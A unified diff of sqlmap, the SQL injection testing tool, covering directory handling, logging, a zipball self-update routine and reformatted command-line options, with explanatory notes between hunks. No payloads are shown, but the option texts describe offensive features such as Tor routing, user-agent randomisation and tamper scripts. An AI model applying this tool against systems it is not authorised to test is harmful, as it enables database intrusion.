+conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, SESSION_SQLITE_FILE)

 if os.path.exists(conf.hashDBFile):
 if conf.flushSession:
@@ -444,13 +449,10 @@ def _resumeHashDBValues():
 conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)

 for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
-if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \
-injection.parameter in conf.paramDict[injection.place]:
+if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]:

 if not conf.tech or intersect(conf.tech, injection.data.keys()):
 if intersect(conf.tech, injection.data.keys()):
 injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)

 if injection not in kb.injections:
 kb.injections.append(injection)

@@ -544,7 +546,7 @@ def _setResultsFile():
 if not conf.resultsFP:
 conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
 try:
-conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+conf.resultsFP = openFile(conf.resultsFilename, "a", UNICODE_ENCODING, buffering=0)
 except (OSError, IOError), ex:
 try:
 warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
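Note: the results file is now opened in append mode ("a") rather than "w+", so an existing file is no longer truncated when the handle is (re)opened. A minimal illustration of the difference, using plain open() instead of sqlmap's openFile() wrapper:

    # "w+" truncates an existing file, "a" preserves its content
    with open("results-demo.csv", "w+") as fp:
        fp.write("first run\n")
    with open("results-demo.csv", "a") as fp:
        fp.write("second run\n")   # both lines are present afterwards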
@@ -576,7 +578,7 @@ def _createFilesDir():

 if not os.path.isdir(conf.filePath):
 try:
-os.makedirs(conf.filePath, 0755)
+os.makedirs(conf.filePath)
 except OSError, ex:
 tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
 warnMsg = "unable to create files directory "
@@ -598,7 +600,7 @@ def _createDumpDir():

 if not os.path.isdir(conf.dumpPath):
 try:
-os.makedirs(conf.dumpPath, 0755)
+os.makedirs(conf.dumpPath)
 except OSError, ex:
 tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
 warnMsg = "unable to create dump directory "
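Note: dropping the explicit 0755 argument leaves os.makedirs() with its default mode (0o777 masked by the process umask) and removes an old-style octal literal that would be a syntax error on Python 3. Equivalent call, for illustration:

    import os

    path = os.path.join("output", "example.com")
    if not os.path.isdir(path):
        os.makedirs(path)   # default mode, subject to the process umask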
@@ -617,18 +619,42 @@ def _createTargetDirs():
 Create the output directory.
 """

-try:
+for context in "output", "history":
-if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
+directory = paths["SQLMAP_%s_PATH" % context.upper()]
-os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
+try:
+if not os.path.isdir(directory):
+os.makedirs(directory)

-_ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr())
+_ = os.path.join(directory, randomStr())
 open(_, "w+b").close()
 os.remove(_)

-if conf.outputDir:
+if conf.outputDir and context == "output":
-warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
+warnMsg = "using '%s' as the %s directory" % (directory, context)
+logger.warn(warnMsg)
+except (OSError, IOError), ex:
+try:
+tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context)
+except Exception, _:
+errMsg = "unable to write to the temporary directory ('%s'). " % _
+errMsg += "Please make sure that your disk is not full and "
+errMsg += "that you have sufficient write permissions to "
+errMsg += "create temporary files and/or directories"
+raise SqlmapSystemException(errMsg)
+
+warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context)
+warnMsg += "'%s' (%s). " % (directory, getUnicode(ex))
+warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
 logger.warn(warnMsg)
-except (OSError, IOError), ex:
+paths["SQLMAP_%s_PATH" % context.upper()] = tempDir
+
+conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
+
+try:
+if not os.path.isdir(conf.outputPath):
+os.makedirs(conf.outputPath)
+except (OSError, IOError, TypeError), ex:
 try:
 tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
 except Exception, _:
@@ -638,34 +664,14 @@ def _createTargetDirs():
 errMsg += "create temporary files and/or directories"
 raise SqlmapSystemException(errMsg)

-warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the")
+warnMsg = "unable to create output directory "
-warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
+warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
 warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
 logger.warn(warnMsg)

-paths.SQLMAP_OUTPUT_PATH = tempDir
+conf.outputPath = tempDir

-conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
+conf.outputPath = getUnicode(conf.outputPath)

-if not os.path.isdir(conf.outputPath):
-try:
-os.makedirs(conf.outputPath, 0755)
-except (OSError, IOError), ex:
-try:
-tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
-except Exception, _:
-errMsg = "unable to write to the temporary directory ('%s'). " % _
-errMsg += "Please make sure that your disk is not full and "
-errMsg += "that you have sufficient write permissions to "
-errMsg += "create temporary files and/or directories"
-raise SqlmapSystemException(errMsg)
-
-warnMsg = "unable to create output directory "
-warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
-warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
-logger.warn(warnMsg)
-
-conf.outputPath = tempDir
-
 try:
 with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
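Note: the rewritten _createTargetDirs() applies one pattern to both the output and history directories: create the directory if needed, prove it is writable with a throw-away file, and fall back to a fresh temporary directory when anything fails. A condensed sketch of that pattern (simplified; sqlmap additionally raises SqlmapSystemException when even the temporary directory cannot be created):

    import os
    import random
    import string
    import tempfile

    def ensure_writable_directory(directory, context="output"):
        try:
            if not os.path.isdir(directory):
                os.makedirs(directory)
            # probe write access with a short-lived random file
            probe = os.path.join(directory, "".join(random.sample(string.ascii_letters, 8)))
            open(probe, "w+b").close()
            os.remove(probe)
            return directory
        except (OSError, IOError):
            # creation or writing failed, use a temporary directory instead
            return tempfile.mkdtemp(prefix="sqlmap%s" % context)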
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

 import codecs
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

 import difflib
@@ -64,9 +64,6 @@ class _ThreadData(threading.local):

 ThreadData = _ThreadData()

-def getCurrentThreadUID():
-return hash(threading.currentThread())
-
 def readInput(message, default=None, checkBatch=True, boolean=False):
 # It will be overwritten by original from lib.core.common
 pass
@@ -98,6 +95,9 @@ def exceptionHandledFunction(threadFunction, silent=False):
 if not silent:
 logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))

+if conf.verbose > 1:
+traceback.print_exc()

 def setDaemon(thread):
 # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
 if PYVERSION >= "2.6":
@@ -168,6 +168,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio

 except (KeyboardInterrupt, SqlmapUserQuitException), ex:
 print
+kb.prependFlag = False
 kb.threadContinue = False
 kb.threadException = True

@@ -188,6 +189,9 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
 kb.threadException = True
 logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))

+if conf.verbose > 1:
+traceback.print_exc()

 except:
 from lib.core.common import unhandledExceptionMessage

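Note: both exception paths above now dump a full traceback only when verbosity is raised. A small self-contained illustration of that pattern:

    import traceback

    def run_safely(func, verbose=0):
        try:
            func()
        except Exception as ex:
            # one-line error message always, full traceback only at higher verbosity
            print("thread error: %s" % ex)
            if verbose > 1:
                traceback.print_exc()

    run_safely(lambda: 1 / 0, verbose=2)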
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

 from lib.core.common import Backend
@@ -1,25 +1,34 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

-import locale
+import glob
 import os
 import re
+import shutil
 import subprocess
+import sys
 import time
+import urllib
+import zipfile

 from lib.core.common import dataToStdout
 from lib.core.common import getSafeExString
+from lib.core.common import getLatestRevision
 from lib.core.common import pollProcess
+from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.revision import getRevisionNumber
 from lib.core.settings import GIT_REPOSITORY
 from lib.core.settings import IS_WIN
+from lib.core.settings import VERSION
+from lib.core.settings import ZIPBALL_PAGE
+from lib.core.settings import UNICODE_ENCODING

 def update():
 if not conf.updateAll:
@@ -28,11 +37,66 @@ def update():
 success = False

 if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
-errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
+warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository "
-errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
+warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
-logger.error(errMsg)
+logger.warn(warnMsg)

+if VERSION == getLatestRevision():
+logger.info("already at the latest revision '%s'" % getRevisionNumber())
+return
+
+message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"
+if readInput(message, default='N', boolean=True):
+directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)
+
+try:
+open(os.path.join(directory, "sqlmap.py"), "w+b")
+except Exception, ex:
+errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex))
+logger.error(errMsg)
+else:
+attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode
+for wildcard in ('*', ".*"):
+for _ in glob.glob(os.path.join(directory, wildcard)):
+try:
+if os.path.isdir(_):
+shutil.rmtree(_)
+else:
+os.remove(_)
+except:
+pass
+
+if glob.glob(os.path.join(directory, '*')):
+errMsg = "unable to clear the content of directory '%s'" % directory
+logger.error(errMsg)
+else:
+try:
+archive = urllib.urlretrieve(ZIPBALL_PAGE)[0]
+
+with zipfile.ZipFile(archive) as f:
+for info in f.infolist():
+info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename)
+if info.filename:
+f.extract(info, directory)
+
+filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py")
+if os.path.isfile(filepath):
+with open(filepath, "rb") as f:
+version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1)
+logger.info("updated to the latest version '%s#dev'" % version)
+success = True
+except Exception, ex:
+logger.error("update could not be completed ('%s')" % getSafeExString(ex))
+else:
+if not success:
+logger.error("update could not be completed")
+else:
+try:
+os.chmod(os.path.join(directory, "sqlmap.py"), attrs)
+except OSError:
+logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py"))
 else:
-infoMsg = "updating sqlmap to the latest development version from the "
+infoMsg = "updating sqlmap to the latest development revision from the "
 infoMsg += "GitHub repository"
 logger.info(infoMsg)

@@ -42,7 +106,7 @@ def update():
 dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))

 try:
-process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
+process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
 pollProcess(process, True)
 stdout, stderr = process.communicate()
 success = not process.returncode
@@ -55,7 +119,7 @@ def update():
 else:
 if "Not a git repository" in stderr:
 errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
-errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')"
+errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
 logger.error(errMsg)
 else:
 logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
@@ -68,7 +132,7 @@ def update():
 infoMsg += "download the latest snapshot from "
 infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
 else:
-infoMsg = "for Linux platform it's required "
+infoMsg = "for Linux platform it's recommended "
 infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"

 logger.info(infoMsg)
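Note: the new non-git fallback above downloads the project zipball and extracts it over the installation directory, stripping the top-level folder from every archive member name. A condensed Python 3 sketch of that extraction step (the zipball URL below is an example; sqlmap reads it from its ZIPBALL_PAGE setting):

    import os
    import re
    import urllib.request
    import zipfile

    ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master"  # example URL
    directory = os.path.abspath("sqlmap")

    archive, _ = urllib.request.urlretrieve(ZIPBALL_PAGE)
    with zipfile.ZipFile(archive) as f:
        for info in f.infolist():
            # drop the leading "<project>-<revision>/" prefix from member names
            info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename)
            if info.filename:
                f.extract(info, directory)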
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

 import os
@@ -47,7 +47,7 @@ class Wordlist(object):
 errMsg = "something appears to be wrong with "
 errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
 errMsg += "sure that you haven't made any changes to it"
-raise SqlmapInstallationException, errMsg
+raise SqlmapInstallationException(errMsg)
 if len(_.namelist()) == 0:
 errMsg = "no file(s) inside '%s'" % self.current
 raise SqlmapDataException(errMsg)
@@ -73,7 +73,7 @@ class Wordlist(object):
 errMsg = "something appears to be wrong with "
 errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
 errMsg += "sure that you haven't made any changes to it"
-raise SqlmapInstallationException, errMsg
+raise SqlmapInstallationException(errMsg)
 except StopIteration:
 self.adjust()
 retVal = self.iter.next().rstrip()
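Note: "raise SomeException, message" is Python 2-only syntax; calling the exception class instead works on both Python 2 and Python 3, which is the direction of these cleanups. A minimal illustration:

    class SqlmapInstallationException(Exception):
        pass

    errMsg = "something appears to be wrong with the wordlist file"

    # Python 2-only form (SyntaxError on Python 3):
    #     raise SqlmapInstallationException, errMsg
    # Portable form:
    raise SqlmapInstallationException(errMsg)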
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

 pass
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

 import re
@@ -1,8 +1,8 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
 """

 import os
@@ -50,9 +50,7 @@ def cmdLineParser(argv=None):
 # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
 _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)

-usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
-"\"%s\"" % _ if " " in _ else _)
+usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _)

 parser = OptionParser(usage=usage)

 try:
@@ -115,15 +113,13 @@ def cmdLineParser(argv=None):
 request.add_option("--load-cookies", dest="loadCookies",
 help="File containing cookies in Netscape/wget format")

-request.add_option("--drop-set-cookie", dest="dropSetCookie",
-action="store_true",
+request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
 help="Ignore Set-Cookie header from response")

 request.add_option("--user-agent", dest="agent",
 help="HTTP User-Agent header value")

-request.add_option("--random-agent", dest="randomAgent",
-action="store_true",
+request.add_option("--random-agent", dest="randomAgent", action="store_true",
 help="Use randomly selected HTTP User-Agent header value")

 request.add_option("--host", dest="host",
@@ -139,62 +135,55 @@ def cmdLineParser(argv=None):
 help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")

 request.add_option("--auth-type", dest="authType",
-help="HTTP authentication type "
-"(Basic, Digest, NTLM or PKI)")
+help="HTTP authentication type (Basic, Digest, NTLM or PKI)")

 request.add_option("--auth-cred", dest="authCred",
-help="HTTP authentication credentials "
-"(name:password)")
+help="HTTP authentication credentials (name:password)")

 request.add_option("--auth-file", dest="authFile",
 help="HTTP authentication PEM cert/private key file")

-request.add_option("--ignore-401", dest="ignore401", action="store_true",
-help="Ignore HTTP Error 401 (Unauthorized)")
+request.add_option("--ignore-code", dest="ignoreCode", type="int",
+help="Ignore HTTP error code (e.g. 401)")

 request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
 help="Ignore system default proxy settings")

 request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true",
 help="Ignore redirection attempts")

 request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true",
 help="Ignore connection timeouts")

 request.add_option("--proxy", dest="proxy",
 help="Use a proxy to connect to the target URL")

 request.add_option("--proxy-cred", dest="proxyCred",
-help="Proxy authentication credentials "
-"(name:password)")
+help="Proxy authentication credentials (name:password)")

 request.add_option("--proxy-file", dest="proxyFile",
 help="Load proxy list from a file")

-request.add_option("--tor", dest="tor",
-action="store_true",
-help="Use Tor anonymity network")
+request.add_option("--tor", dest="tor", action="store_true",
+help="Use Tor anonymity network")

 request.add_option("--tor-port", dest="torPort",
 help="Set Tor proxy port other than default")

 request.add_option("--tor-type", dest="torType",
 help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")

-request.add_option("--check-tor", dest="checkTor",
-action="store_true",
-help="Check to see if Tor is used properly")
+request.add_option("--check-tor", dest="checkTor", action="store_true",
+help="Check to see if Tor is used properly")

 request.add_option("--delay", dest="delay", type="float",
 help="Delay in seconds between each HTTP request")

 request.add_option("--timeout", dest="timeout", type="float",
-help="Seconds to wait before timeout connection "
-"(default %d)" % defaults.timeout)
+help="Seconds to wait before timeout connection (default %d)" % defaults.timeout)

 request.add_option("--retries", dest="retries", type="int",
-help="Retries when the connection timeouts "
-"(default %d)" % defaults.retries)
+help="Retries when the connection timeouts (default %d)" % defaults.retries)

 request.add_option("--randomize", dest="rParam",
 help="Randomly change value for given parameter(s)")
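Note: most of the command-line parser churn above is cosmetic: multi-line optparse declarations are folded so that action="store_true" and the whole help string sit on the option's opening line. A minimal optparse sketch in the same (post-change) style:

    from optparse import OptionGroup, OptionParser

    parser = OptionParser(usage="python sqlmap.py [options]")

    request = OptionGroup(parser, "Request", "These options can be used to specify how to connect to the target URL")
    request.add_option("--random-agent", dest="randomAgent", action="store_true",
                       help="Use randomly selected HTTP User-Agent header value")
    request.add_option("--timeout", dest="timeout", type="float",
                       help="Seconds to wait before timeout connection (default 30)")
    parser.add_option_group(request)

    options, _ = parser.parse_args(["--random-agent", "--timeout", "10"])
    print(options.randomAgent, options.timeout)   # True 10.0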
@@ -211,8 +200,7 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
||||||
help="Test requests between two visits to a given safe URL")
|
help="Test requests between two visits to a given safe URL")
|
||||||
|
|
||||||
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Skip URL encoding of payload data")
|
help="Skip URL encoding of payload data")
|
||||||
|
|
||||||
request.add_option("--csrf-token", dest="csrfToken",
|
request.add_option("--csrf-token", dest="csrfToken",
|
||||||
@@ -221,44 +209,36 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_option("--csrf-url", dest="csrfUrl",
|
request.add_option("--csrf-url", dest="csrfUrl",
|
||||||
help="URL address to visit to extract anti-CSRF token")
|
help="URL address to visit to extract anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--force-ssl", dest="forceSSL",
|
request.add_option("--force-ssl", dest="forceSSL", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
|
||||||
request.add_option("--hpp", dest="hpp",
|
request.add_option("--hpp", dest="hpp", action="store_true",
|
||||||
action="store_true",
|
help="Use HTTP parameter pollution method")
|
||||||
help="Use HTTP parameter pollution method")
|
|
||||||
|
|
||||||
request.add_option("--eval", dest="evalCode",
|
request.add_option("--eval", dest="evalCode",
|
||||||
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
||||||
|
|
||||||
# Optimization options
|
# Optimization options
|
||||||
optimization = OptionGroup(parser, "Optimization", "These "
|
optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap")
|
||||||
"options can be used to optimize the "
|
|
||||||
"performance of sqlmap")
|
|
||||||
|
|
||||||
optimization.add_option("-o", dest="optimize",
|
optimization.add_option("-o", dest="optimize", action="store_true",
|
||||||
action="store_true",
|
help="Turn on all optimization switches")
|
||||||
help="Turn on all optimization switches")
|
|
||||||
|
|
||||||
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
|
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
|
||||||
help="Predict common queries output")
|
help="Predict common queries output")
|
||||||
|
|
||||||
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
|
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
|
||||||
help="Use persistent HTTP(s) connections")
|
help="Use persistent HTTP(s) connections")
|
||||||
|
|
||||||
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
|
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
|
||||||
help="Retrieve page length without actual HTTP response body")
|
help="Retrieve page length without actual HTTP response body")
|
||||||
|
|
||||||
optimization.add_option("--threads", dest="threads", type="int",
|
optimization.add_option("--threads", dest="threads", type="int",
|
||||||
help="Max number of concurrent HTTP(s) "
|
help="Max number of concurrent HTTP(s) "
|
||||||
"requests (default %d)" % defaults.threads)
|
"requests (default %d)" % defaults.threads)
|
||||||
|
|
||||||
# Injection options
|
# Injection options
|
||||||
injection = OptionGroup(parser, "Injection", "These options can be "
|
injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts")
|
||||||
"used to specify which parameters to test "
|
|
||||||
"for, provide custom injection payloads and "
|
|
||||||
"optional tampering scripts")
|
|
||||||
|
|
||||||
injection.add_option("-p", dest="testParameter",
|
injection.add_option("-p", dest="testParameter",
|
||||||
help="Testable parameter(s)")
|
help="Testable parameter(s)")
|
||||||
@@ -270,36 +250,30 @@ def cmdLineParser(argv=None):
|
|||||||
help="Skip testing parameters that not appear to be dynamic")
|
help="Skip testing parameters that not appear to be dynamic")
|
||||||
|
|
||||||
injection.add_option("--param-exclude", dest="paramExclude",
|
injection.add_option("--param-exclude", dest="paramExclude",
|
||||||
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
|
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
|
||||||
|
|
||||||
injection.add_option("--dbms", dest="dbms",
|
injection.add_option("--dbms", dest="dbms",
|
||||||
help="Force back-end DBMS to this value")
|
help="Force back-end DBMS to provided value")
|
||||||
|
|
||||||
injection.add_option("--dbms-cred", dest="dbmsCred",
|
injection.add_option("--dbms-cred", dest="dbmsCred",
|
||||||
help="DBMS authentication credentials (user:password)")
|
help="DBMS authentication credentials (user:password)")
|
||||||
|
|
||||||
injection.add_option("--os", dest="os",
|
injection.add_option("--os", dest="os",
|
||||||
help="Force back-end DBMS operating system "
|
help="Force back-end DBMS operating system to provided value")
|
||||||
"to this value")
|
|
||||||
|
|
||||||
injection.add_option("--invalid-bignum", dest="invalidBignum",
|
injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use big numbers for invalidating values")
|
help="Use big numbers for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--invalid-logical", dest="invalidLogical",
|
injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use logical operations for invalidating values")
|
help="Use logical operations for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--invalid-string", dest="invalidString",
|
injection.add_option("--invalid-string", dest="invalidString", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use random strings for invalidating values")
|
help="Use random strings for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--no-cast", dest="noCast",
|
injection.add_option("--no-cast", dest="noCast", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Turn off payload casting mechanism")
|
help="Turn off payload casting mechanism")
|
||||||
|
|
||||||
injection.add_option("--no-escape", dest="noEscape",
|
injection.add_option("--no-escape", dest="noEscape", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Turn off string escaping mechanism")
|
help="Turn off string escaping mechanism")
|
||||||
|
|
||||||
injection.add_option("--prefix", dest="prefix",
|
injection.add_option("--prefix", dest="prefix",
|
||||||
@@ -312,54 +286,40 @@ def cmdLineParser(argv=None):
|
|||||||
help="Use given script(s) for tampering injection data")
|
help="Use given script(s) for tampering injection data")
|
||||||
|
|
||||||
# Detection options
|
# Detection options
|
||||||
detection = OptionGroup(parser, "Detection", "These options can be "
|
detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")
|
||||||
"used to customize the detection phase")
|
|
||||||
|
|
||||||
detection.add_option("--level", dest="level", type="int",
|
detection.add_option("--level", dest="level", type="int",
|
||||||
help="Level of tests to perform (1-5, "
|
help="Level of tests to perform (1-5, default %d)" % defaults.level)
|
||||||
"default %d)" % defaults.level)
|
|
||||||
|
|
||||||
detection.add_option("--risk", dest="risk", type="int",
|
detection.add_option("--risk", dest="risk", type="int",
|
||||||
help="Risk of tests to perform (1-3, "
|
help="Risk of tests to perform (1-3, default %d)" % defaults.risk)
|
||||||
"default %d)" % defaults.risk)
|
|
||||||
|
|
||||||
detection.add_option("--string", dest="string",
|
detection.add_option("--string", dest="string",
|
||||||
help="String to match when "
|
help="String to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--not-string", dest="notString",
|
detection.add_option("--not-string", dest="notString",
|
||||||
help="String to match when "
|
help="String to match when query is evaluated to False")
|
||||||
"query is evaluated to False")
|
|
||||||
|
|
||||||
detection.add_option("--regexp", dest="regexp",
|
detection.add_option("--regexp", dest="regexp",
|
||||||
help="Regexp to match when "
|
help="Regexp to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--code", dest="code", type="int",
|
detection.add_option("--code", dest="code", type="int",
|
||||||
help="HTTP code to match when "
|
help="HTTP code to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--text-only", dest="textOnly",
|
detection.add_option("--text-only", dest="textOnly", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Compare pages based only on the textual content")
|
help="Compare pages based only on the textual content")
|
||||||
|
|
||||||
detection.add_option("--titles", dest="titles",
|
detection.add_option("--titles", dest="titles", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Compare pages based only on their titles")
|
help="Compare pages based only on their titles")
|
||||||
|
|
||||||
# Techniques options
|
# Techniques options
|
||||||
techniques = OptionGroup(parser, "Techniques", "These options can be "
|
techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques")
|
||||||
"used to tweak testing of specific SQL "
|
|
||||||
"injection techniques")
|
|
||||||
|
|
||||||
techniques.add_option("--technique", dest="tech",
|
